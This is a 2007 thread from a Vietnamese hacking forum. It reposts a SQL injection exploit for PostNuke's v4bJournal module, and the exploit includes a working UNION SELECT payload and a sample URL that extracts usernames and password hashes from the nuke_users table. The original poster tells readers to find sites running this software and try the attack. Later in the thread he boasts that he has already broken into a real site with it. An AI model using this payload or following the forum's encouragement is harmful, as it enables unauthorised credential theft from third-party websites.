banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Post Nuke v4bJournal Module Sql Inject (02-05-07)  XML
  [Announcement]   Post Nuke v4bJournal Module Sql Inject (02-05-07) 04/05/2007 00:13:06 (+0700) | #1 | 56950
[Avatar]
SonNguyen_sn
Member

[Minus]    0    [Plus]
Joined: 16/04/2007 20:10:44
Messages: 53
Offline
[Profile] [PM]
Vừa check được chú này. Mọi người kiếm cái site nào sử dụng Source này. Test thử cái xem thế nào.

PostNuke Journal

----------------------------------------

DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran

Greetz For All Y! UnderGround Group Members ( www.2600.ir )

Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

Contact: abbasi (at) ustmb.ac (dot) ir [email concealed]

{SQL BUG}

in

index.php?module=v4bJournal&func=journal_comment&id=(SQL)------------------------------------------

EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/selec
t/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/n
uke_users/**/where/**/pn_uid=2/*EX:-

http://www.example.com/index.php?mod...urnal_comment&
id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,1
1,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*

U must regrister first ( You Most Have An Account On Vulnerable Site )
[Up] [Print Copy]
  [Question]   Post Nuke v4bJournal Module Sql Inject (02-05-07) 04/05/2007 00:26:58 (+0700) | #2 | 56952
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
Vừa check được chú này 

cái này bên milw0rm có share rồi mà
try it now ^_^
ax. cha này pót lên mà còn bỏ đi cái example của người ta nữa chứ smilie
các bạn xem trang này thì sẽ rõ Code:
http://milw0rm.com/exploits/3835
[Up] [Print Copy]
  [Question]   Post Nuke v4bJournal Module Sql Inject (02-05-07) 04/05/2007 00:59:14 (+0700) | #3 | 56961
[Avatar]
SonNguyen_sn
Member

[Minus]    0    [Plus]
Joined: 16/04/2007 20:10:44
Messages: 53
Offline
[Profile] [PM]

minhquan1712 wrote:
Vừa check được chú này 

cái này bên milw0rm có share rồi mà
ax. cha này pót lên mà còn bỏ đi cái example của người ta nữa chứ smilie
 


Nhầm hàng rồi!
Ý tớ là Tớ vừa chiến đc 1 thằng dùng cái Post - Nuke nhờ cái bug này.
Hớ hớ.

Lần sau check lại bài tớ à nhá.
Hỉu nhầm thế lày thì bán E-Gold mà ăn cám à smilie)

smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|